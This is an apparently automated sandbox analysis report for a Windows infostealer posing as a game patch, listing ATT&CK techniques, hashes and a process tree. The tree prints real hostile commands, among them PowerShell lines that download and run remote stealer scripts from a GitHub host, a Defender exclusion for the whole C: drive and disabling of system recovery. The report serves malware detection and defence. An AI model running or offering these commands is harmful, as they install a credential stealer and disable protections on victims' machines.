585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

Analysis

max time kernel
70s
max time network
86s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13/08/2024, 20:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chameleon-Byfronpatch2.exe
Size

9.2MB
MD5

addbf6301c1ea797554a0152da23d5ae
SHA1

01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256

585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512

9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP

98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
12	3792	powershell.exe
11	3456	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4844	powershell.exe
3456	powershell.exe
3792	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	Chameleon-Byfronpatch2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3376	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3692	ARP.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2036	netsh.exe
4576	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3544	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4332	ipconfig.exe
3544	NETSTAT.EXE
3608	ipconfig.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3792	powershell.exe
3456	powershell.exe
4844	powershell.exe
3792	powershell.exe
4844	powershell.exe
3456	powershell.exe
3792	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeIncreaseQuotaPrivilege	3792	powershell.exe
Token: SeSecurityPrivilege	3792	powershell.exe
Token: SeTakeOwnershipPrivilege	3792	powershell.exe
Token: SeLoadDriverPrivilege	3792	powershell.exe
Token: SeSystemProfilePrivilege	3792	powershell.exe
Token: SeSystemtimePrivilege	3792	powershell.exe
Token: SeProfSingleProcessPrivilege	3792	powershell.exe
Token: SeIncBasePriorityPrivilege	3792	powershell.exe
Token: SeCreatePagefilePrivilege	3792	powershell.exe
Token: SeBackupPrivilege	3792	powershell.exe
Token: SeRestorePrivilege	3792	powershell.exe
Token: SeShutdownPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeSystemEnvironmentPrivilege	3792	powershell.exe
Token: SeRemoteShutdownPrivilege	3792	powershell.exe
Token: SeUndockPrivilege	3792	powershell.exe
Token: SeManageVolumePrivilege	3792	powershell.exe
Token: 33	3792	powershell.exe
Token: 34	3792	powershell.exe
Token: 35	3792	powershell.exe
Token: 36	3792	powershell.exe
Token: SeIncreaseQuotaPrivilege	3792	powershell.exe
Token: SeSecurityPrivilege	3792	powershell.exe
Token: SeTakeOwnershipPrivilege	3792	powershell.exe
Token: SeLoadDriverPrivilege	3792	powershell.exe
Token: SeSystemProfilePrivilege	3792	powershell.exe
Token: SeSystemtimePrivilege	3792	powershell.exe
Token: SeProfSingleProcessPrivilege	3792	powershell.exe
Token: SeIncBasePriorityPrivilege	3792	powershell.exe
Token: SeCreatePagefilePrivilege	3792	powershell.exe
Token: SeBackupPrivilege	3792	powershell.exe
Token: SeRestorePrivilege	3792	powershell.exe
Token: SeShutdownPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeSystemEnvironmentPrivilege	3792	powershell.exe
Token: SeRemoteShutdownPrivilege	3792	powershell.exe
Token: SeUndockPrivilege	3792	powershell.exe
Token: SeManageVolumePrivilege	3792	powershell.exe
Token: 33	3792	powershell.exe
Token: 34	3792	powershell.exe
Token: 35	3792	powershell.exe
Token: 36	3792	powershell.exe
Token: SeIncreaseQuotaPrivilege	3792	powershell.exe
Token: SeSecurityPrivilege	3792	powershell.exe
Token: SeTakeOwnershipPrivilege	3792	powershell.exe
Token: SeLoadDriverPrivilege	3792	powershell.exe
Token: SeSystemProfilePrivilege	3792	powershell.exe
Token: SeSystemtimePrivilege	3792	powershell.exe
Token: SeProfSingleProcessPrivilege	3792	powershell.exe
Token: SeIncBasePriorityPrivilege	3792	powershell.exe
Token: SeCreatePagefilePrivilege	3792	powershell.exe
Token: SeBackupPrivilege	3792	powershell.exe
Token: SeRestorePrivilege	3792	powershell.exe
Token: SeShutdownPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeSystemEnvironmentPrivilege	3792	powershell.exe
Token: SeRemoteShutdownPrivilege	3792	powershell.exe
Token: SeUndockPrivilege	3792	powershell.exe
Token: SeManageVolumePrivilege	3792	powershell.exe
Token: 33	3792	powershell.exe
Token: 34	3792	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 3964	2556	Chameleon-Byfronpatch2.exe	84
PID 2556 wrote to memory of 3964	2556	Chameleon-Byfronpatch2.exe	84
PID 2556 wrote to memory of 3496	2556	Chameleon-Byfronpatch2.exe	87
PID 2556 wrote to memory of 3496	2556	Chameleon-Byfronpatch2.exe	87
PID 2556 wrote to memory of 4844	2556	Chameleon-Byfronpatch2.exe	88
PID 2556 wrote to memory of 4844	2556	Chameleon-Byfronpatch2.exe	88
PID 2556 wrote to memory of 3916	2556	Chameleon-Byfronpatch2.exe	86
PID 2556 wrote to memory of 3916	2556	Chameleon-Byfronpatch2.exe	86
PID 2556 wrote to memory of 3456	2556	Chameleon-Byfronpatch2.exe	91
PID 2556 wrote to memory of 3456	2556	Chameleon-Byfronpatch2.exe	91
PID 2556 wrote to memory of 3792	2556	Chameleon-Byfronpatch2.exe	92
PID 2556 wrote to memory of 3792	2556	Chameleon-Byfronpatch2.exe	92
PID 3496 wrote to memory of 3864	3496	cmd.exe	96
PID 3496 wrote to memory of 3864	3496	cmd.exe	96
PID 3456 wrote to memory of 3196	3456	powershell.exe	97
PID 3456 wrote to memory of 3196	3456	powershell.exe	97
PID 3792 wrote to memory of 3068	3792	powershell.exe	98
PID 3792 wrote to memory of 3068	3792	powershell.exe	98
PID 3068 wrote to memory of 2816	3068	csc.exe	99
PID 3068 wrote to memory of 2816	3068	csc.exe	99
PID 3196 wrote to memory of 592	3196	csc.exe	100
PID 3196 wrote to memory of 592	3196	csc.exe	100
PID 3792 wrote to memory of 4576	3792	powershell.exe	104
PID 3792 wrote to memory of 4576	3792	powershell.exe	104
PID 3792 wrote to memory of 3452	3792	powershell.exe	106
PID 3792 wrote to memory of 3452	3792	powershell.exe	106
PID 3452 wrote to memory of 2264	3452	net.exe	107
PID 3452 wrote to memory of 2264	3452	net.exe	107
PID 3792 wrote to memory of 3376	3792	powershell.exe	108
PID 3792 wrote to memory of 3376	3792	powershell.exe	108
PID 3792 wrote to memory of 1004	3792	powershell.exe	109
PID 3792 wrote to memory of 1004	3792	powershell.exe	109
PID 3792 wrote to memory of 4220	3792	powershell.exe	112
PID 3792 wrote to memory of 4220	3792	powershell.exe	112
PID 4220 wrote to memory of 4372	4220	net.exe	113
PID 4220 wrote to memory of 4372	4220	net.exe	113
PID 3792 wrote to memory of 4332	3792	powershell.exe	114
PID 3792 wrote to memory of 4332	3792	powershell.exe	114
PID 3792 wrote to memory of 908	3792	powershell.exe	115
PID 3792 wrote to memory of 908	3792	powershell.exe	115
PID 908 wrote to memory of 2060	908	net.exe	116
PID 908 wrote to memory of 2060	908	net.exe	116
PID 3792 wrote to memory of 5012	3792	powershell.exe	117
PID 3792 wrote to memory of 5012	3792	powershell.exe	117
PID 3792 wrote to memory of 3544	3792	powershell.exe	118
PID 3792 wrote to memory of 3544	3792	powershell.exe	118
PID 3792 wrote to memory of 3916	3792	powershell.exe	119
PID 3792 wrote to memory of 3916	3792	powershell.exe	119
PID 3792 wrote to memory of 3608	3792	powershell.exe	120
PID 3792 wrote to memory of 3608	3792	powershell.exe	120
PID 3792 wrote to memory of 1056	3792	powershell.exe	121
PID 3792 wrote to memory of 1056	3792	powershell.exe	121
PID 3792 wrote to memory of 3692	3792	powershell.exe	122
PID 3792 wrote to memory of 3692	3792	powershell.exe	122
PID 3792 wrote to memory of 2036	3792	powershell.exe	123
PID 3792 wrote to memory of 2036	3792	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3964	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3964
- C:\Windows\system32\reagentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:3916
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3496
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:3864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zotzorgq\zotzorgq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE3F.tmp" "c:\Users\Admin\AppData\Local\Temp\zotzorgq\CSCBB1F0B866DD46CEA8FCB64C17F1D2.TMP"
      4⤵
      PID:592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0qjymdbv\0qjymdbv.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCD8.tmp" "c:\Users\Admin\AppData\Local\Temp\0qjymdbv\CSCCA02806762B4CAEA46CB64795E2FFEA.TMP"
      4⤵
      PID:2816
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4576
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3452
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2264
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3376
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:1004
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:4372
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4332
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2060
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:5012
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:3544
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3916
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:3608
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1056
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:3692
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
db5c65c5bb3a0b8a1babd09b9689bba2

SHA1
c6b985c3ba6cd5541051f280e42d3ebdda34ba35

SHA256
e813a8003afc17037bc8d36e9a2e6df1f089191e47fcb93bccc9130f4974f7d4

SHA512
23698b318565b650ed44abef445a3548283ac7bc270a432421acb16c03a3593e4c56a5e65c6c5fe721dad0e41e0c6f929ac1350249a47788ea68f66083021762

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6f9c526cc5aa328e4b5af3513117e818

SHA1
0c4e72c0aab4b9b8c8bf60979d5280c776b046bd

SHA256
b3e9d7a5114cbe61c44b30318fca201e09a405963ccae3e2d8f1d1251464a432

SHA512
24b68d1d6ac30c8a0ffe52abc2a698e9224a8dce23860275e1749693036e9c4e2e065222fed809130de6030caa9b20f7e1d931517f359e715813a23f4454627c

Download Submit
C:\Users\Admin\AppData\Local\Temp\0qjymdbv\0qjymdbv.dll

Filesize
4KB

MD5
1f210e4eefa2680c35a09e35e16fce66

SHA1
1e960bac82016305da1e9589299b349498f8d878

SHA256
eea11390571fe27c6714b6d360af9902811001c0de585ac73a73584c4556b2f0

SHA512
385711f5e72dc7bac48dbaf8a01ff52d726ae3b9441d9125f2d04347c5486a9eab224104f956f23202d53de916be7ce43882726af18bed4e62549aadabe66dbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBCD8.tmp

Filesize
1KB

MD5
c8802b3e5321b468aa8683a101fe5b11

SHA1
332303e8d3d3713d03b07d9ff9ed6b1bfa9becb7

SHA256
f20eda3091e2480e50c1901aea2be0ac4b17aecd2a9d77fe03f2bb3c3ea9606b

SHA512
5e8ea5a9693afb38f91aa2e2a8dec8300158887047c061a1ce67066f312f81909944b9da42138111b374b930ff850219873465fa03333e027696c8d34039b6a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBE3F.tmp

Filesize
1KB

MD5
b5827a607bcff893e99f2f6a7e46b736

SHA1
29992bac1dd99cc076b3f9e25f3446d01af035c5

SHA256
60f4bc89abd969f62976a5c9a157af3c03ab580460c9acd1ff1da30eeef979db

SHA512
0d8ea463568639aa2380de4811acd585997265a369ca583ac21fb3bf05305578f9784852b46cb528e5c7aac96e25ef4a16e1efe7646e824d5b8f4eb1358ef945

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
401KB

MD5
fa39f52a57ac2f132641c0afe329afd5

SHA1
e7a422964e0f90c2a420362db85d31209751d79c

SHA256
937669c851e3c7f356092069b877a2f82143ddedb5024530491dd5cde8a085d9

SHA512
a2167ce24e8658bcc8f1660028085bf07f5e9c05a25fbe7577529ceb42af64ceac69b3d7496b4c7e93a34a0ed75f7bf0b499bd9f00fbb1a199c11183cc049f3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
61KB

MD5
8f172ab859ee217119988cc60fdf2c67

SHA1
8c4c7bb36860fc6b6321393be58434c1b2c087c5

SHA256
d55ebc097425dfcbe24ba5b6d129e6150d089b8f94b4273433ff246177ddbfd6

SHA512
622b7e46967d8bc54d6dfab66b6237f5416129e8981e06a941fe2f38dc058c8293071de594147cb5e7f7bb59b65eb1795e2cd73221027571aa3445c1cb314040

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihrlpny4.jtm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zotzorgq\zotzorgq.dll

Filesize
4KB

MD5
0674950c38d7849ebff4da6d4aa0f458

SHA1
f56b01aa5a2de83c75d4574b4aebbdf7dc9f52be

SHA256
ee77b4ec6b0046d452b7e8e721d3d11c0be77720a7ea1a5a207bb69672573c0c

SHA512
cfee8096d318c648954d854b6158fdb80723fefe9a4844d7f4e2745d3ccee6ad5326c99646bc3f66a3e26838fab30f58ea33a2bc005d8655eff1654e6ce63486

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
33963639fb0ee0d79107103504711c9e

SHA1
b5c525632b94582ac863c600bc613ab658fab61b

SHA256
c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

SHA512
b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0qjymdbv\0qjymdbv.cmdline

Filesize
369B

MD5
ed1e3edea27625bd3bba364dfa71fb7d

SHA1
cb09cb2a85ecf17f93a8c5240968740122d16449

SHA256
8c0b9c752db1d4c88fba990c29ecda7d5ca997a2a766282c773ec0782ecc1c73

SHA512
d62f0190f2b9df3a3568f318b1d238dfc71f743e2e9dfebf742fd5420e045956cd514896112452d44d7e85744a06ca09e67255097ce66ec12d957b6a1a877b38

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0qjymdbv\CSCCA02806762B4CAEA46CB64795E2FFEA.TMP

Filesize
652B

MD5
2efd2e1163aae0a6b591c943423bec6d

SHA1
c5afc9b4691f9ffcd23d8966ae2dda51e2a57608

SHA256
15304f19cae626abbfa9ec954fc25acae62ee55fad6500694ae7f6b0708c438c

SHA512
9aebddf33577fe24f19009bd40cbd73c69855bcfe26589f2314305393ae9222f8ff4517a44d89f8909b85c31d1bef00fff2e87b9d3959657456fc07c628ebbc1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zotzorgq\CSCBB1F0B866DD46CEA8FCB64C17F1D2.TMP

Filesize
652B

MD5
5fd625e56c50d8061120fbad1d9717f4

SHA1
41711eb24590a03acf1f1a67784a1abffeb82eb1

SHA256
189e41a74ce3dc872ee018aedd5eb9929b9e33297bd366051967aea39fed80b5

SHA512
283bcadaab7c9cb32f26a3912f1a830022c34f89b5a5a9aaf72c83aa7316e45b7b101a6ac7075acbf84a7b03add575570db48ab0115ed61deb93ab6d9d4f1195

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zotzorgq\zotzorgq.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zotzorgq\zotzorgq.cmdline

Filesize
369B

MD5
7227ccd0d082f85441c83c1f74917201

SHA1
a5075be112997d9125d37459e735600598a19c2a

SHA256
c43d36dc11d9c368671863136a7da34c855d762a955185962e44afa3a207ddef

SHA512
5df927f0d45c4c78483f8b5bae7fa61b96fa12bf54af38671bac22f1fd35198477b339311dd6fec163408ee623fb59e8af761d33f29c9da1a4165e0e056e12b7

Download Submit
memory/3456-72-0x00000262EE850000-0x00000262EE858000-memory.dmp

Filesize
32KB

Download
memory/3792-70-0x000002F201F90000-0x000002F201F98000-memory.dmp

Filesize
32KB

Download
memory/3792-74-0x000002F280670000-0x000002F280E16000-memory.dmp

Filesize
7.6MB

Download
memory/3792-82-0x000002F27FEC0000-0x000002F27FEEA000-memory.dmp

Filesize
168KB

Download
memory/3792-83-0x000002F27FEC0000-0x000002F27FEE4000-memory.dmp

Filesize
144KB

Download
memory/3792-19-0x000002F27FE90000-0x000002F27FEB2000-memory.dmp

Filesize
136KB

Download
memory/3792-9-0x00007FFAA7D50000-0x00007FFAA8811000-memory.dmp

Filesize
10.8MB

Download
memory/3792-115-0x000002F27FE60000-0x000002F27FE72000-memory.dmp

Filesize
72KB

Download
memory/3792-116-0x000002F27FE00000-0x000002F27FE0A000-memory.dmp

Filesize
40KB

Download
memory/3792-6-0x00007FFAA7D50000-0x00007FFAA8811000-memory.dmp

Filesize
10.8MB

Download
memory/3792-125-0x00007FFAA7D50000-0x00007FFAA8811000-memory.dmp

Filesize
10.8MB

Download
memory/3792-3-0x00007FFAA7D53000-0x00007FFAA7D55000-memory.dmp

Filesize
8KB

Download